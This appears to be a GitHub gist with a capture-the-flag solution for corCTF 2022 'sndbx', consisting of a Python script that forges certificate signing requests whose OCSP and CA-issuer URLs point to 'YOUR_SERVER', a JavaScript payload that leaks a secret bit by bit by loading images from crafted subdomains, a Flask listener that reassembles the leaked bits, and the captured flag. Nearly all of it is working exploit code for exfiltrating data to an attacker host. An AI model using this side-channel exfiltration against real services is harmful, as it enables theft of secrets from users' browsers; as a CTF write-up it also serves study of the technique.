Skip to content

Instantly share code, notes, and snippets.

@maple3142

maple3142/gen_certs.py

Created August 8, 2022 00:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save maple3142/27df5143acc1c5ef3639f4f4e65d0fc8 to your computer and use it in GitHub Desktop.
Save maple3142/27df5143acc1c5ef3639f4f4e65d0fc8 to your computer and use it in GitHub Desktop.
Download ZIP
corCTF 2022 sndbx
Raw
gen_certs.py
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import (
NameOID,
ExtendedKeyUsageOID,
AuthorityInformationAccessOID,
)
def gen(ocsp_url, ca_url):
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
)
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name(
[
x509.NameAttribute(NameOID.COMMON_NAME, "*.daplie.me"),
]
)
)
builder = builder.add_extension(
x509.SubjectAlternativeName([x509.DNSName("*.daplie.me")]), critical=False
)
builder = builder.add_extension(
x509.ExtendedKeyUsage([ExtendedKeyUsageOID.OCSP_SIGNING]), critical=False
)
builder = builder.add_extension(
x509.AuthorityInformationAccess(
[
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier(ocsp_url),
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier(ca_url),
),
]
),
critical=False,
)
request = builder.sign(private_key, hashes.SHA256())
csr = request.public_bytes(serialization.Encoding.PEM)
priv = private_key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.NoEncryption(),
)
return csr, priv
import httpx
ar = []
for i in range(8):
csr, priv = gen("http://YOUR_SERVER/bit/" + str(i), "http://YOUR_SERVER/ca")
client = httpx.Client(base_url='https://daplie.me', verify=False)
client.post('/create')
r = client.post('/add', data={
'csr': csr.decode(),
'priv': priv.decode(),
})
u = r.text.split('<span class="code">')[1].split('</span>')[0]
print(i)
print(u)
print()
ar.append(u)
print(ar)
"""
const urls = ['adskeijoftisltjsmafdka.daplie.me', 'loqygyu03-c63wtg5pa9ja.daplie.me', 'xuz4rnbfa2_w7hyztxk0wa.daplie.me', 'pdvlygbkm1_f6w1xwwbiig.daplie.me', 'hqv7fki-8yuq7vrsarfxpg.daplie.me', 'bhd-psznuerilr9guvirdw.daplie.me', 'g36jgxy49ydyk1pm86djdq.daplie.me', 'ztnoo5ddk18mzxdjl5cvsg.daplie.me']
;(async ()=>{
const c = flag.charCodeAt(0) // change this to leak other flag char
for(let i=7;i>=0;i--){
if((c>>i)&1){
(new Image).src = 'https://' + urls[i]
}
}
})()
corctf{i_hate_x509_11fb05ad469e4721}
"""
Raw
server.py
from flask import Flask
import logging
app = Flask(__name__)
app.logger.setLevel(logging.INFO)
bits = [0] * 8
@app.route("/bit/<n>", methods=["POST"])
def bit(n):
bits[int(n)] = 1
app.logger.info(bits)
app.logger.info(chr(int("".join(map(str, bits[::-1])), 2)))
return ""
app.run(host="0.0.0.0", port=80)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment